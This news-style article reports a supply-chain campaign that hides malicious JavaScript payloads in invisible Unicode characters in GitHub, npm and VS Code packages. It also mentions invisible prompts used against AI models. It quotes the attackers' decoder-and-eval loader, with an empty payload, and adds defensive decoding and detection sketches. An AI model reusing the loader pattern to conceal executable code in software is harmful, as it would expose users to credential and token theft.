Supply-chain attack using invisible code hits GitHub and other repositories

The invisible code is rendered with Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

The invisible Unicode characters were devised many years ago and then largely forgotten. That is, until 2024, when hackers began using the characters to hide malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading it and following the malicious instructions it conveyed. AI engines have since devised guardrails designed to restrict use of the characters, but such defenses are periodically overridden.

Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. At runtime, however, a small JavaScript decoder extracts the actual bytes and passes them to the eval() function.

const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);


eval(Buffer.from(s(``)).toString('utf-8'));

“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”
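To make the mapping concrete, here is a minimal sketch of how an analyst might apply the same arithmetic as the decoder quoted above while printing the result instead of passing it to eval(). The function names decodeSelectors and buildSample are hypothetical and do not come from Aikido's post, and the sample payload is a harmless string built only for the demonstration.

```javascript
// Hypothetical helper names; the arithmetic mirrors the decoder quoted above.
// Each invisible code point maps to one byte value between 0 and 255.
function decodeSelectors(text) {
  const bytes = [];
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    if (cp >= 0xFE00 && cp <= 0xFE0F) {
      bytes.push(cp - 0xFE00);          // U+FE00..U+FE0F   -> bytes 0..15
    } else if (cp >= 0xE0100 && cp <= 0xE01EF) {
      bytes.push(cp - 0xE0100 + 16);    // U+E0100..U+E01EF -> bytes 16..255
    }
    // Any other character is ignored, like the null filter in the original.
  }
  return Buffer.from(bytes);
}

// Inverse mapping, used here only to build a harmless sample string.
function buildSample(text) {
  return [...Buffer.from(text, 'utf-8')]
    .map(b => String.fromCodePoint(b < 16 ? 0xFE00 + b : 0xE0100 + b - 16))
    .join('');
}

const hidden = buildSample('console.log("hi")');

// The string renders as nothing, yet it contains one code point per byte.
console.log('code points in hidden string:', [...hidden].length);

// Print the decoded text for inspection; never hand it to eval().
console.log(decodeSelectors(hidden).toString('utf-8'));
```

Printing the decoded bytes rather than executing them lets a reviewer read what a suspicious string would have run.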

Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction of those spread across the campaign because many have been deleted since first being uploaded.

The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and looking for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear legitimate, particularly when invisible Unicode characters are encoding malicious payloads.
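Because visual inspection cannot catch characters that do not render, a manual review can be supplemented with an automated check. The following is a minimal sketch, not a vetted detector: the function name findHiddenCodePoints, the list of ranges, and the threshold of eight code points per line are all assumptions chosen for illustration. The threshold is there because a lone variation selector such as U+FE0F appears legitimately in emoji sequences.

```javascript
// Assumed, non-exhaustive list: the two ranges used by the decoder quoted in
// this article, plus the Unicode private use areas.
const SUSPICIOUS_RANGES = [
  [0xFE00, 0xFE0F],     // variation selectors
  [0xE0100, 0xE01EF],   // variation selectors supplement
  [0xE000, 0xF8FF],     // Private Use Area
  [0xF0000, 0xFFFFD],   // Supplementary Private Use Area-A
  [0x100000, 0x10FFFD], // Supplementary Private Use Area-B
];

function isSuspicious(codePoint) {
  return SUSPICIOUS_RANGES.some(([lo, hi]) => codePoint >= lo && codePoint <= hi);
}

// Report every line holding at least minCount suspicious code points.
// minCount is a hypothetical tuning knob, not a recommended value.
function findHiddenCodePoints(source, minCount = 8) {
  const findings = [];
  source.split('\n').forEach((text, index) => {
    let count = 0;
    for (const ch of text) {
      if (isSuspicious(ch.codePointAt(0))) count++;
    }
    if (count >= minCount) findings.push({ line: index + 1, count });
  });
  return findings;
}

// Line 2 of this sample hides ten invisible code points inside backticks.
const sample = 'const a = 1;\neval(s(`' + '\u{E0161}'.repeat(10) + '`));';
console.log(findHiddenCodePoints(sample)); // one finding: line 2, count 10
```

A check like this could run over a dependency's files before installation. It only flags candidates for a closer look and does not replace reviewing what a package actually does.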
